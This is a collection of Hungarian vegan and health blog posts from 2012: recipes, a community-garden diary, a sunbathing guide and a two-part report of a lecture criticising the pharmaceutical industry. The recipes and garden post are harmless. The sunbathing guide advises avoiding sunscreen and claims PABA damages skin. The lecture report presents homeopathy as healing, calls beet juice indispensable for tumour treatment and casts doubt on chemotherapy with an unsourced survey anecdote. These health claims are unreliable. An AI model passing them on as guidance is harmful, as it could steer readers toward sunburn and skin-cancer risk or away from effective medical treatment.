helyes napozás alkalmazásával 138.000 esetben előzik meg a rákos megbetegedéseket. Az amerikaiak helyesen alkalmazva a rendszeres napozás gyakorlatát, 30.000 rákos megbetegedéssel járó halált előzhetnének meg. A magas dózisú napsugárzás bőrrákot okozhat. Ennek a rákfajtának mintegy 95 %-a két típusba sorolható. Pikkelyes és alapsejtű rák. Mindkettőt előidézheti a hosszú éveken át tartó erős napsugárzásban fürdőzés. A másik típusa a bőrráknak a melanoma. Ez egészen más jellegű, mint az előző kettő. Az általában sötét színű rákos folt gyorsan terjed és halálos kimenetelű is lehet. Ezzel a veszélyes bőrbetegséggel kapcsolatban nem az a fontos, hogy mennyi ideig tartózkodunk a napon, hanem, hogy leégünk-e vagy sem. Tehát a túl erős napsugárzást kell elsősorban kerülnünk. Ha mérsékelt égövön élünk, a napfürdőzésre a legalkalmasabb idő télen délelőtt 10 és délután 3 óra között. Nyár folyamán pedig délelőtt és délután. Ha viszont a trópusokon élünk, kerüljük el napközben a napsugárzást. Ha bőrünk érzékeny, kezdjük napi öt perccel előröl és öt perccel hátulról. Az adagot naponta 5-5 perccel növelve egy órás dózisig. Sötétebb bőrű egyének kezdhetik 15 perccel, öt perc helyett is növelhetik 15 perccel. Kerüljük a napozást étkezés előtt egy órával és étkezés után egy órával. A napenergia megváltoztathatja saját energia-egyensúlyunkat és megakadályozza, megnehezíti emésztésünket. Amikor olyan nagyfokú visszatükröződésnek vagyunk kitéve, mint a hó; védjük arcunkat és szemünket maszkkal, álarccal és napszemüveggel. A hó az ibolyán túli sugarak 85, a homok kb. 20, a víz pedig 5 százalékát tükrözi vissza. Figyeljünk arra, hogy ne aludjunk el a napon! Éppen így keletkeznek komoly felégések. Ha lehet ne tartózkodjunk egy óránál több ideig ragyogó napsütésen, hacsak nem cserzett a bőrünk. Ne felejtsük el, hogy ködös, felhős napokon is feléghetünk. Ha napszemüveget viselünk, gondoskodjunk arról, hogy szemünkhöz közvetlen szűretlen napfény jusson. Sétáljunk a szabad levegőn napszemüveg nélkül. Soha ne nézzünk a Napba, mert komoly retina és idegkárosodást okozhat! A közvetett épületekről, vízről, talajról és a környezetünkben lévő tárgyakról visszatükröződő fény éppen annyi energiát tartalmaz, amennyire szükségünk van. Amennyire csak lehet, kerüljük el a napolajok használatát. A legtöbbjük paraamino-benzoesavat tartalmaz (PABA) oldott állapotban. A PABA kiszűr néhány sugarat, de azokat a hullámhosszokat is kiszűri, amelyek hasznunkra van. Kutatás jelzi, hogy a PABA a bőrsejteket is károsíthatja. Maga az olajalap is káros lehet, ha a Nap hevíti. A legjobb Nap elleni védelem a széles karimájú kalap és a védelmet jelentő (vászon) ruházat. Napozzunk okosan, éljünk egészségesen és a betegségek nagy része elkerülhet bennünket!
Epertorta
2012. május 16. Mindennapi ételeink
Anyósom születésnapjára készítettem ezt a meglepetés tortát. Mivel kedvence az eper, 1 kg epret varázsoltam bele :-). Nem egészen olyan lett, mint amilyet szerettem volna, de végülis az ünnepeltnek ízlett, és ez a lényeg. Nem akartam túlbonyolítani, ennek prózai okai vannak: sajnos időm sem volt sok, másfelől pedig nem vagyok ügyes tortaformázó, egyszerűen nincsen türelmem és tehetségem hozzá. Ezért mindig egyszerű, mindennel együtt max. 50 perc alatt elkészíthető tortákat készítek. Hozzávalók: dupla adag vegán csokis piskóta 1 kg eper 3 zacskó vaníliapuding 10 dkg kókuszolaj 1,5 liter növényi tej 5 ek. karob mandulaszeletek 15 dkg nyírfacukor 1 rúd vanília Elkészítés: A piskótát a hagyományos módon elkészítettem. Az eprek felét négy fele vágtam, a többit félbe. A növényi tejet feltettem főni, a pudingokat összekevertem kb.10 ek.növényi tejjel, és amikor forrt a tej, akkor belekevertem, sűrűsödésig főztem,ekkor ízesítettem nyírfacukorral és vaníliával. Ha nem elég sűrű, akkor 2 ek. psylliumot keverhetünk hozzá, ez egy természetes sűrítőanyag. Majd a harmadát kivettem, és karobot adtam hozzá (elvileg, de mivel apósom és sógorom ezt nem szereti, most kértem kölcsön 5 ek. kakaót, és azt adtam hozzá:). Kihűtöttem a krémeket, ekkor arányosan elosztva hozzákevertem a megkeményített (hideg helyen tárolt) kókuszolajat. A piskótát félbe vágtam (nem volt magas, így nem jött volna ki több részre vágás), megkentem a karobos/csokis krémmel, majd rászórtam a negyedbe vágott epreket, erre jött a vaníliapuding. Majd ismét a piskóta. Az egészet a vaníliakrémmel vontam be, és a félbevágott eprekkel, ill. mandulaszeletekkel díszítettem. Nem lett valami díjnyertes a kinézete sem. De azért elég gyorsan elfogyott:-)
Kókuszcukor … hallottál már róla?
Ma reggel láttam meg a boltban ezt a fura valamit. Kókuszcukor … kókuszvirág cukor … ízlelgettem a szót, majd kézbe vettem, néztem jobbról, néztem balról, és máris tettem a kosaramba kipróbálásra. Micsoda érdekesség! Erről a természetes édesítőről még nem hallottam. A csomagolás hátoldalán ezt lehet olvasni róla: Kókuszvirág cukor – a természet csodája Fogyasztása 5000 [...]
Sárgarépás szezámtej
2012. május 14. Gitta nyersétel blogja
Magas kalcium tartalma miatt különösen ajánlom ezt a finomságot. (a szezámmag súlyarányosan kalciumban gazdagabb, mint a tehéntej) A színe már magával ragadó, és az állaga is finom, selymes. Annak van szerencséje, aki kedveli a kesernyés ízeket, mert könnyebb ezt az italt megszeretni, nem szokványos. Valami van benne, amitől az ember újra és újra megkívánja. Hozzávalók 1 liter italhoz: 15 dkg szezámmag (egy pár órára beáztatva, hogy az enzimek feléledjenek) 10 dkg sárgarépa tisztított víz A magokat a feldarabolt sárgarépával, kevés vízzel simára turmixoljuk. Felöntjük annyi vízzel, hogy kb 1 liter legyen. Szűrőzsákkal leszűrjük. A masszához öntünk még egy kis vizet, hogy még több magtejet préselhessünk ki belőle. Édesíteni nem szükséges, mert a szezámmagnak és a répának jó kis természetes ízei vannak, kár lenne ezeket elnyomni.
Gombás-tofus rizottó
"Ha egy évre tervezel, vess rizst;ha egy évtizedre, ültess fákat;ha pedig egy életre, akkor tanítsd az embereket"(Régi kínai közmondás) A rizs a világon a legrégebbi idők óta termesztett gabonaféle, amit több száz országban ültetnek. A világ gabonatermésének 30%-át a rizs adja. A világ rizstermesztésének mintegy fele olyan földekről származik, amelyeket teljes egészében kézi erővel művelnek meg. Az ázsiai hagyományos művelés során az asszonyok ültetik és gyomlálják a rizst, a férfiak pedig a talaj-előkészítést és az elárasztással kapcsolatos munkákat végzik.A rizs valószínű Kínából származik, bár Koreában is a legősibb termények közé számít. Magyarország területén a rizst a 18. század végén kezdték termeszteni.A barna, fényezetlen rizs fogyasztásáról a 19. században kezdtek áttérni - különösen Ázsiában - a fényezett rizsre, amelyről a vitaminokat és fehérjéket tartalmazó terméshéjat eltávolítják. Ezeknek a tápanyagoknak a hiánya a beriberi nevű betegség gyakoriságának növekedését okozta. A beriberi szingaléz nyelven annyit tesz: "nem tudom, nem tudom", és a tiamin (B1 vitamin) és más vitaminok, valamint ásványi anyagok hiánya következtében fellépő bénító hatásra utal. Tünetei egyebek között letargia és kimerültség. A beriberi vagy másnéven kakke, gyakori betegség Ázsiában.A fenti ismertető után következzen egy barna rizsből készült olasz étel - egy rizottó gombával és tofuval ízesítve.A recept: Hozzávalók: - 20 dkg barna rizs - 20 dkg csiperke gomba - 20 dkg laska gomba - 20 dkg füstölt tofu - 1 fej hagyma - 4 szál újhagyma - 2 nagyobb darab színesebb paprika aprítva (nekem a fagyasztóból került elő) - 1 zöldségleves kocka - 1-1,5 dl víz - ételízesítő Elkészítés:A rizst, miután alaposan megmostuk, bő vízben a leveskockával nem túl puhára megfőzzük. Az a jó, ha pergősre sikerül a rizs, és nem fő szét, hanem szép különálló szemek lesznek. Amíg a rizs fő, elkészítjük a többi hozzávalót. A gombákat megpucoljuk, alaposan megmossuk. Felszeleteljük. A hagymát megfosztjuk héjától és felaprítjuk. Fogunk egy edényt és feltesszük a hagymát. Én teflon bevonatú edényt használok, így nem kell hozzá sem olaj, sem kókuszzsír, sem víz, egyszerűen csak elkezdem pirítani a hagymát. Ha nem teflon bevonatú, akkor szükség lehet olajra vagy pároláshoz (egészségesebb) vízre.A sárgára pirult hagymához hozzáadjuk a gombaszeleteket, átforgatjuk és tovább pároljuk. Ha minden jól megy, a gomba ereszt levet. Kb. 1 csapzott evőkanál ételízesítőt szórunk gombákra. Miközben párolódnak, felszeleteljük a tofut. Amikor már láthatóan megpuhultak a gombák, hozzáadjuk a tofukockákat (vagy tofucsíkokat), valamint a felaprított újhagymákat és paprikákat. Átkeverjük. 1 dl vízzel felöntjük. A lényeg, hogy ne legyen nagyon szószos, pörköltes állaga. Közepes lángon megvárjuk, míg rottyan egyet. Majd a pergős rizsszemekkel összekeverjük.Friss újhagymát és retket raktam a tányérra hozzá, de ha lett volna itthon ecetes vagy kovászos uborka, minden bizonnyal azzal is kipróbálom.A rizs főzési idejét leszámítva ismét egy gyorsan elkészíthető étellel állunk szembe. Aki fehér rizst, sőt gyorsrizst használ, annak minden bizonnyal belefér a 30 perces készítési időbe. A barna rizzsel ez kb. 15-20 perccel tovább tart, de megéri. Jázminrizzsel és vadrizzsel is nagyon finom.
Friss saláta a Lecsós Kertből
2012. május 10. Zizi kalandjai
Szerettem volna már korábban is írni a kis parcellánkról, ami a Lecsós Kertben található, de úgy gondoltam, hogy képek nélkül nem izgalmas a dolog. Most, hogy már elég sok minden kibújt a kertben, van téma a fotózásra, így bemutatom, hogy mit is termelünk Budapest egy apró szegletében. Februárban jutottunk hozzá a parcellánkhoz. A Közösségi Kertek szervezésében pályázni lehetett (vagyis online jelentkezni) a kis kertekre. Többszörös túljelentkezés volt, ezért úgy döntöttek a szervezők, hogy sorsolás útján döntik el, hogy kinek jusson parcella. Így került a mi nevünk is a kalapba, aztán pedig a szerencsés nyertesek közé (I. nevét húzták ki, nem az enyémet :)). Rukkola (elég csenevész volt, de aztán burjánzásnak indult - hurrá!) Hihetetlen népszerűsége miatt a városban egyre nagyobb a szervezkedés a közösségi kerteket illetően és egyre több helyen indul meg a gazdálkodás. Remélem ez a pozitív kezdeményezés országszerte elterjed és egyre több városban lesz lehetőség kertészkedésre (ha valahol már működik, osszátok meg itt kommentben, hogy mások is értesülhessenek a jó hírről). Ma délután ledöbbentem a változásokon, hogy mennyit nőttek a növények néhány nap alatt és nagyon büszke vagyok, hogy ilyen takaros kis kertünk lett. Anya és apa tanácsát igyekeztem megfogadni veteményezéskor és palántázáskor, meg a gyerekkori kertészkedős emlékek is felszínre kerültek. Követem Bálint Gazdát Facebookon és Twitteren is. Jó sok hasznos tanáccsal látja el a kezdőket, sokat lehet tanulni tőle. Antikváriumokból pedig beszereztem néhány gyöngyszemet, amelyekből szintén sokat lehet tanulni a biogazdálkodásról, a növényekről, a kertészkedésről (Gertrud Frank: Öngyógyító kiskert, Rudolf Steiner: A mezőgazdálkodás gyarapodásának szellemtudományos alapjai). Mángold Cukkini Ma este pedig az első betakarított terményből készült egyszerű saláta: rukkola levelek, retek, kevés olívaolaj, citromlé, csipet só. Hozzá néhány szelet teljeskiörlésű kenyérből fokhagymás pirítós, tökmagolajjal meglocsolva, pirospaprikával megszórva és kecskesajt. Néha a legegyszerűbb dolgok a legfenségesebbek! Igaz? Cirmos bab Jó kertészkedést mindenkinek!
Rozmaringos-fokhagymás sült édesburgonya krémleves és Kölesgombóc fahéjas-"joghurtos" öntettel
2012. május 8. A vegán szépség
Bűntudatmentes brownie
Szeretem a brownie-t. Vagyis szeretném, ha nem kellene annyi cukrot belerakni, hogy puha, ragadós legyen. Ezért nem is sütöttem eddig sokszor, mert kevesebb cukorral mindig szárazabb lett és nem olyan volt az íze, textúrája, ahogyan ezeket elképzeltem a látott fotó(k) alapján. Ez azonban már történelem... most már tudok olyan brownie-t készíteni, ami elég édes úgy, hogy nincsen benne cukor, semmilyen egyéb mesterséges édesítőszer, mégis finom, puha, ragadós. Nincsen benne tojás és tejtermék, valamint liszt sem! Igen, jól olvastátok. Sok olyan alapanyag kimaradt ebből a brownie-ból, amelyek egy hagyományos receptben előfordulnak. Ez egy egészséges brownie! Sőt sütni sem kell, ami előnyös nagy melegben. Inkább hűteni kell, hogy összeálljon. Egy jó aprítógép szükséges hozzá, hogy a tésztát összeállítsuk. Ennyi. Felcsigáztalak benneteket? A receptért köszönet Sarah-nak! Bűntudatmentes brownie Hozzávalók egy 22*22 cm-es tepsihez: - 2 és 1/2 bögre datolya, kimagozva - 1 bögre cukrozatlan kakaópor - 2 bögre dió - 1/2 bögre mandula, durvára aprítva - 1/4 teáskanál só Tegyük a diót az aprítógépbe és daráljuk meg. Adjuk hozzá a kakaót, a sót és kapcsoljuk be újra a gépet néhány percre. Kezdjük el adagolni a datolyát szemenként miközben az aprítógép dolgozik. Dolgoztassuk, amíg a tészta összeáll (kicsit szemcsésnek és száraznak tűnhet, de ha egy kis darabot kiveszünk belőle, akkor érezzük, hogy ragadós az állaga). Nyomkodjuk ezt a keveréket a formába és szórjuk meg a tetejét a mandulával (az ujjunkkal nyomkodjuk a mandulát a brownie tetejébe). Tegyük a fagyasztóba kb. 20-30 percre vagy a hűtőbe 2-3 órára. Hűtés után vágjuk kockákra és élvezzük bűntudat nélkül! :)
Zabpelyhes túrótorta
2012. május 6. Lét-tudatos konyha
Sütés nélkül készíthető el az alábbi édesség. Állagát, tartását a zselatin növényi megfelelője, az agaragar biztosítja. Hozzávalók: 7 dkg vaj 10 dkg zabpehely 25 dkg eper 50 dkg túró 1 evőkanál joghurt 10 dkg szőlőcukor 2 evőkanál citromlé 1 evőkanál agaragar por (zselatin helyett) 2,5 dl növényi tejszín
Almás - diós pite
A pite tésztája már szerepel a máktorta receptjénél, csak a tölteléket cseréltem ki. Nagyjából hatvan dekányi almát vágtam apróra dióval, tettem hozzá egy jó marék mazsolát és most épp tápióka sziruppal édesítettem.
Egy falat menta
2012. április 25. Gitta nyersétel blogja
A kertünkben kibújt a menta, egyre nagyobb helyet követelve magának. Annak idején 1 cseréppel ültettem ki, de már úgy kell visszavágni, hogy más fűszernövénynek is legyen helye. Alig várom már a hétvégét, hogy újra ültethessek, kicsit a kertre is legyen időm végre. Most viszont kipróbáltam egy régóta vágyott, uborkás-mentás italt, és bizony nem bántam meg! Alig vártam, hogy elkészüljenek a fotók, és már ittam is meg... nagyon frissítő, üdítő élmény volt! Recept 2-3 pohárhoz: 8-10 menta szár levelekkel együtt 2-3 alma 1 kígyóuborka 1 narancs A menta leveleket megmossuk, a narancsot meghámozzuk. Minden hozzávalót beleteszünk a lékészítő gépbe (gyümölcscentrifuga vagy présgép, ami van) A menta azon túl, hogy kellemes az íze, kitűnő szere az epezavarok, felfúvódás, az emésztőrendszer megbetegedéseinek. Gyomor és bélzavarok esetén is ezt ajánlják a népi gyógyászatban. Érdemes kipróbálni egy nehezebb vacsora másnapján, vagy ,,csak úgy is.
Vegán muffin
2012. április 23. Mindennapi ételeink
Finom, gyors-egyszerű és laktató édesség. Hozzávalók - 9 db muffinhoz: 25 dkg liszt (fele teljes kiőrlésű, fele finomliszt) 8 dkg nyírfacukor 6 ek. Pithari extra szűz olívaolaj 1 kisebb tk. Arm& Hammer szóda 2,5 dl vaníliás szójatej 2-3 ek. karobpor -- 9 db kis eper -- 1/3 l vaníliás szójatej 1 cs.vaníliapuding Elkészítés: A tészta alapanyagait jó alaposan összekeverjük. Majd egy muffinformát kiolajozunk, lisztezünk és mindegyik rész felébe töltjük a tésztát. Majd ebbe beleteszünk 1-1 kisebb epret- úgy, hogy négy fele vágjuk. Majd befedjük a tésztával. Közepes lángon kisütjük, kb. 40 perc alatt. Eközben elkészítjük a vaníliapudingot: vaníliás szójatejben megfőzzük a vaníliapudingot. Mivel a tej is ízesített, nem szükséges cukrot adnunk hozzá. Amikor kisült a muffinunk, a pudingot rápakoljuk és elfogyasztjuk (miután kihűlt:-).
A gyógyszeripar árnyoldalai - 2. rész
Az előadás közben megismerhettük azt a - talán sokak által ismert - tényt is, hogyan működik a gyógyszeripar. A gyógyszeripari cégek az orvosokra háromféleképpen hatnak: Egyrészt tudományos előadásokon, ahol fizetett orvosi előadók vannak jelen. Nem ritka eset, hogy egy-egy professzort adott gyógyszeripari cég úgymond ,,megvásárol. Ennek következményeként azt a gyógyszeripari céget szolgálja előadásaival, termékei közvetett úton történő reklámozásával. Továbbá különböző szórólapokat juttatnak el orvosokhoz, orvosi rendelőkbe, gyógyszertárakba. S ami a legdurvább, de nyílt titokként működik az a direkt juttatási formák, amikor egy gyógyszer ,,termékeny felírását követően a gyógyításunkra felesküdt szolgálttevő(?) személy utazást, vagy egyéb nagyobb értékű ajándékot kap. (És most érdemes egy pillanatra belegondolni, hogy influenza szezon után miért vagy inkább miből mennek el pihenni háziorvosaink? - persze nem állítom, hogy minden orvos így él és dolgozik. Tisztelet a kivételnek!) További az orvosokra történő ráhatás módja az adott gyógyszeripari cégek támogatott orvos látogatója, amelynek feladata az új gyógyszer(ek) ajánlása, észben tartatása - mindezt egészen trükkös módon - ügyelve arra, hogy a gyógyszer neve négyszer biztos elhangozzon az álinformációk (árváltozás, vizsgálati eredmények, stb.) bemutatása során. Miért ilyen drágák, és miért egyre drágábbak a gyógyszerek? Azt gondolnánk laikus módon, mert drága a kutatás. Igen ám, de a cégek költségvetésének 30-40%-a maketing! Gondoljunk bele abba is, hogy egy doboz pirula megvásárlása esetén az árnak tartalmaznia kell az orvos látogató személyzet költségeit (telefon, autó, továbbképzések, tréningek, ezekhez tartozó szállás, étel, italfogyasztás és egyéb szórakozás, orvosok számára szánt ajándékokról nem is beszélve). Mindemellett sok gyógyszeren állami támogatás is jelen van. Nem véletlen, hogy a hadiipar után az egyik legjövedelmezőbb üzletág a gyógyszeripar. Néhány közelmúltbéli értékesítési adat ezzel kapcsolatban: Pfizer 45,197 millions $ GlaxoSmithKline 39,452 millions $ Sanofi-Aventis 36,102 millions $ A haszonkulcs néhány ismert gyógyszerre, gyógyszertípusra levetítve - 100 tablettát alapul véve: Gyógyszer neve/típusa Fogyasztási ár ($) Költség ($) Szorzó Xanax 136,79 0,024 5699,58 Norvasc 188,29 0,14 1344,93 Antibiotikum 482,19 18,78 78,92 Az előadáson szó esett arról is, hogy kik vannak egy-egy gyógyszer-érdekeltség hátterében. Elsősorban tudnunk kell arról, hogy az olajipar-vegyipar-gyógyszeripar érdekkapcsolatban áll egymással. Napjainkban az orvostudományi egyetemeken erősen gyógyszerközpontú képzés folyik. Vagyis egy leendő orvos akaratlanul is el kell, hogy sajátítsa a különböző pirulákkal kapcsolatos ismereteket, még ha ezek a gyógyszerek sok esetben csak tüneti kezelést nyújtanak, de a fő, kiinduló problémára nem szolgálnak megfelelő megoldást, sőt legtöbb esetben olyan újabb és újabb mellékhatásokat eredményeznek, amelyek újabb gyógyszerek felírását teszik szükségessé, elkerülhetetlenné. Nem beszélve arról, hogy az érdekeltség hátterében megbújnak azok az alapítványi iskolák, amelyeket különböző tőkéscsoportok befolyásolnak, s ahol a nemtetsző eredmények eltusolása is történik. Majd egy rövidebb szövegrészt idézett prof. Brooser Gábortól (Medical-Tribune - 2006) ,,A medicina technikai üzletté vált, a gép- és gyógyszerfejlesztés rendkívül tőkeerős világának a kezébe került. Lassan a gyógyszergyár megveszi magának a betegeket, a műszergyár az orvosokat. De a szerencsétlen beteg mit vegyen meg? Mindaz, amit fontosnak tartott az életében, most összeomlani látszik, vagy legalábbis más irányba tart. (...) Régen a továbbképzés olcsó volt és a szakma kívánságai szerint működött. Ma ez már messze nem így van; ha a gyógyszergyárak csinálják, akkor van továbbképzés, ha nem, akkor nincs, és a gyógyszergyáraknak persze megvannak a maguk szempontjai Az előadáson kifejtésre került az is, hogy miért baj a gyógyszerszedés? ,,Ma több amerikai nyeli a gyógyszereket, mint valaha. Az emberek azonban nem értik, hogy ezek a gyógyszerek legalább annyit ártanak, mint használnak, legalábbis a tápanyagok szempontjából nézve. A gyógyszerek nagyon gyakran meggátolják a tápanyagok felszívódását, vagy befolyásolják és akadályozzák, hogy a sejtek normálisan felhasználják. (Vitamin Biblia 367. oldal)"Haver, sajnálom, hogy rossz napod volt a suliban, de emlékezz arra, amit anyád mindig mond: Xanax a legjobb orvosság" Ha nem is utolsó sorban, de az előadáson a homeopátiás készítményekkel kapcsolatban is tiszta víz került a pohárba. A homeopátia radikálisan új és radikálisan ősi kísérlet a gyógyítás tudományos és művészi, tudományos és hitbeli vonásainak egyesítésére. A klasszikus homeopátia szerei abszolút a személyiség centrumára hatnak (...) A homeopátiás szer nem ezt vagy azt a betegséget gyógyítja. Változtat az élethelyzeten. Jó energiát ad arra, hogy a beteg képes legyen másként látni a világot, a betegségét, saját élethelyzetét, hogy egy addig megoldhatatlannak tűnő dolgot meg tudjon oldani. (Homeopátiás gyógyművészség)Aki ott volt az előadáson, az tényleg sok értékes információval gazdagodhatott, melynek töredékét megpróbáltam most két részletben visszaadni.(1. rész)
A gyógyszeripar árnyoldalai - 1. rész
Rendkívül érdekes és még inkább tanulságos előadásban volt részünk tegnap este a TF-n. Legjobb képességemmel igyekszem továbbadni, amit csak sikerült lejegyeznem - sajnos a teljesség igénye nélkül.A képen a "Drug Companies" a Gyógyszeripari cégeket jelenti. (Aki nem tudna angolul.) Kezükben az orvosok, mint a marionett bábuk, úgy írják fel a recepteket, gyógyszereket. Az előadó (dr. Lukács Tamás) felhívta elsők közt a figyelmet arra, hogy betegségeink 95%-a életmód eredetű , valamint, a természetben nagyon sok növény gyógyító hatással rendelkezik, amelyek nem a tünetet kezelik, hanem a probléma forrására hatnak. Két gyógynövényt ki is emelt az előadás elején. Az egyik az aloe vera, amely fogyasztása jótékony hatással bír többek között a hasnyálmirigyre, így befolyásolva és jó irányba segítve a cukorbetegséget. A másik gyógynövény példa a mirha volt. Egy igen érdekes történetet mondott el ezzel kapcsolatban: Létezik egy trópusi vidékek édes vizeiben összeszedhető betegség, ez a Schistosomiasis. Ezekben az édes vizekben élő bizonyos lárvák képesek áthatolni az egészséges bőrfelületen, és a test belső szervezetében megtelepedni, szaporodni, ezáltal pedig különböző belső rendszerbeli károkat eredményeznek. Ennek a betegségnek kiváló gyógyító hatású szere a mirha. Természetesen csak trópusi éghajlatú édes vizekben lehetséges ezt a fertőzést elkapni. (pl: Brazília, Afrika bizonyos részei, Távol Kelet, stb.) Az előadás során beszélt arról a fontos tényről is, hogy a gyógyszereket sem szabad teljes mértékben mellőzni, bizony vannak esetek, amikor életet mentenek, habár mellékhatásaik tekintetében óvatosan kell velük bánni. A hallgatóság megismerkedhetett a CITOKROM p450 enzimmel, amely a gyógyszerek lebontásáért felelős. A doktor úr elmondta, hogy ma nincs olyan nap, hogy ne kelljen cukorbeteget operálni, ez pedig a gyógyszerek sok mellékhatásához vezethető vissza. Napjainkban legalább 6000 törzskönyvezett gyógyszer van. 2008-ban Ausztráliában egy mérgezést kutató intézetben vizsgálatok alapján megállapították, hogy 119 ezer segélykérő telefonhívás majdnem felét (48%) 5 év alatti gyermekek véletlen gyógyszer túladagolása miatt kapták. Ezeknek a gyógyszereknek a zöme paracatemol tartalmú tablettákkal volt kapcsolatos. 5 tablettányi paracatemol a májban már kimutatható. Angliában évi 20 májátültetést végeznek kizárólag a paracatemol tabletták fogyasztása miatt. Tehát a paracatemol tabletták csak rövid ideig kis mennyiségben adhatók a szervezetnek. Megtudhattuk, hogy mindig az originális gyógyszerek a legjobbak, szemben a generikus gyógyszerekkel. Az originális gyógyszerek, ahogy a neve is jelzi, az eredeti készítmények. Ezeknél a teljes gyártási technológiát mellékelni kell. Szabadalmuk 20 évig tart. Ennek lejárta után a cégeknek kötelező nyilvánosságra hozni a gyógyszermolekulát, s ezt követően gyártásuk más cégek számára is lehetővé válik, de ezek már a generikus gyógyszerek. A hallgatóság sorai között ülve okosabbak lehettünk a táplálék kiegészítőkkel kapcsolatban is. Csak szúrópróba szerűen vizsgálják az összetevőket. Nem biztos, hogy valóban azok az összetevők kerülnek a tablettákba, kapszulákba, mint ami a dobozokon fel van tüntetve, így ha csak lehetséges, törekedjünk a vitaminok természetes úton történő bevitelére. Például kálcium esetén minimum napi egy kanál őrölt szezámmag és mák fogyasztása ajánlott. A C-vitamin nagyon fontos a szervezet számára. Napi 1 gramm C-vitamin fogyasztása mindenképpen ajánlott. Szent-Györgyi Albert betegség idején akár 7 gramm C-vitamint fogyasztott. Ha tehetjük, elsősorban növényi kivonatú C-vitamint válasszunk. Érdekes dolog, hogy a kutyák és kecskék szervezete képes C-vitamint előállítani. Az emberi szervezet sajnos nem, így szükséges fogyasztani - lehetőleg minél természetesebb módon. Daganatkezeléshez nélkülözhetetlen és nagyon sokat számít a C-vitamin, és a céklalé. Daganatok kapcsán betekintés nyertünk a kemoterápia kialakulásának történetébe. A kemoterápia a világháborúban bevetett mustárgáz hatásának köszönhette kialakulását. Egy bevetés során ugyanis mustárgázt használtak állóháborúban egy frontvonal mentén. Egy kiskatona túlélte ezt a támadást és javult a leukémiája. Ezt követően kezdték el a molekulaláncait úgy változtatni, hogy az egészségügyben is használható legyen. Ami mellette szól, vannak már annyira korszerű szerek - mint pl. interferon kezelés esetében gyógyulás áll be. A doktor úr a kemoterápiával kapcsolatban azt javasolta, hogy alkalmazása esetén mindenképp beszéljük át a kemoterápia lehetőségét az onkológussal. Kérjünk tőle időt, beszéljük végig az eshetőségeket. Tegyük fel a kérdéseket: mi lenne, ha kapnánk a terápiát, mi van, ha nem kapjuk meg? Mennyire mérgező? Mennyire viseli meg a szervezetet? Különböző stádiumban, különböző betegségek más és más kezelést igényelnek. Ne feledjük, a kemoterápia sejtpusztítással gyógyít, és nem válogatja meg (nem tudja megválogatni), hogy egészséges, vagy beteg, rosszindulatú sejtet pusztít el. ,,Nemrég Koppenhágában több száz orvost, közöttük elég sok rákspecialistát kérdeztek meg a kemoterápiáról. Az orvosok nagy része úgy nyilatkozott, hogy ők maguk nem folyamodnának ehhez a gyógymódhoz, bár betegeiknek továbbra is ezt javasolják. (Reisinger János A lelkiismeret - 120. oldal)(folytatás következik)
reteksaláta - csak így egyszerűen
2012. április 17. Napló étkeinkről, életünkről
Hozzávalók: 1 csomag retek, szőröstül-bőröstül. A többi meg ahogy éppen adódik. Ma reggel apró paradicsom, mézes-szezámkrém és némi fűszer került bele. A piacon furcsán néznek rám az árusok, hogy a zöldjéért veszem a retket, pedig még az is lehet, hogy értékesebb, mint a gumója... Tegnap a fiam ritkította a reteksort a kertben, és a mit kiszedett, némi mosás után rögtön meg is ettük. A kertészkedésben ezeket a pillanatokat szeretem, ilyenkor érezni igazán, hogy honnan van a táplálékunk :-) Szép napot, és finom, éltető táplálékot kívánok mindannyiunk asztalára!
hogyan készítsünk otthon quiche-t?
2012. április 16. Vegasztrománia
imádom a francia konyhát és életérzést, s bár az olasz nő ideáját jobban magamon viselem, rejtőzik bennem egy francia is. lili szombaton tette le felsőfokú nyelvvizsgáját franciából. maki dim sum órája után találkoztunk, mert francia estebédet és minőségi nővér-húg időtöltést terveztünk. "véletlenül" belefutottunk a király utcai vásárba, és ittunk egy kávét a la petite française-ben (hol máshol?). utána hazasétáltunk, és csináltam egy francia lepényt, vagyis quiche-t. quiche-t (ejtsd: kis) először a budagyöngye aljában lévő szega sajtkereskedésben ettem, szerelem volt első harapásra. a későbbiekben nagy kedvencemmé váltak a különböző verziók. szeretem mindenféle zöldséggel, és mindenféle méretben, egy szabályom van csak, mindig egy nagy adag balzsamecetes zöldsalátával eszem. spenótos quiche hozzávalók (egy 30 cm átmérőjű cakkos szélű tortaformához) 200 g finomliszt + egy kevés a tészta kezeléséhez 100 g vaj + egy kevés a forma kikenéséhez só 2-3 evőkanál hideg víz (nekem most több kellett) olívaolaj 500 g spenót jó alaposan megmosva 2-3 (-4-5) gerezd apróra vágott fokhagyma 200 g sajt (most gouda) 3 tojás 200 ml tejszín 100 g krémsajt só fehér bors szerecsendió a sütőt előmelegítettem 200 °C-ra (6-os fokozat). a lisztet egy nagy tálba szitáltam, megsóztam, a vajat felkockáztam és összemorzsoltam a liszttel (ebben nagyon nagy segítség volt a késes robotgépem). utána kanalanként adtam hozzá a vizet, és összegyúrtam (itt felül kell bírálni, hogy kell-e még víz). letakarva legalább 30 percre a hűtőbe tettem. a spenótot kevés olívaolajon megpároltam, sóval, borssal, fokhagymával ízesítettem (főzzük el a levét, vagy szűrjük le). egy tálban összekevertem a tejszínt, a tojást, a krémsajtot, és a reszelt sajtot, sóztam, borsoztam és szerecsendiót reszeltem rá. a tésztát kinyújtottam és a kivajazott formába nyomkodtam. megszurkáltam villával, sütőpapírt tettem rá és babot szórtam rá (azt a babot ezután már nem lehet felhasználni, csak nehezékként szolgál). az előmelegített sütőben 15 percig sütöttem a babbal, és további 5 percig a bab és a sütőpapír nélkül. utána szétterítettem rajta a spenótot, ráöntöttem a sajtos keveréket, majd 180 °C-ra (4-es fokozat) mérsékelt sütőben 30 perc alatt aranybarnára sütöttem (ez az idő is sütőfüggő, van olyan recept, amelyik 45 percet ír). hogyan készítsünk otthon szusit? hogyan készítsünk otthon tortillát?
reggeli
egy átlagos böjti reggeli: narancslé fahéjjal és zöldekkel, ma saláta, spenót, petrezselyem és csalán. korábban összekevertem az egészet, de hétfő óta szerelembe estem a zöld levekkel. és azt a furcsa felfedezést tettem szerdán, hogy a lé bársonyos sós-édessége a tejre emlékeztet (amit csak életem egy nagyon rövid periódusában szerettem), és a szaga ugyan változatlanul zöld, az ízén már egyáltalán nem érzem, ami korábban úgy zavart, ellenben.. lehet hogy magtej helyett zöld tejet fogok készíteni eztán, csak sűrűbben.. hmm.. banánturmix? :D
Csokitojás /Raw chocolate egg/
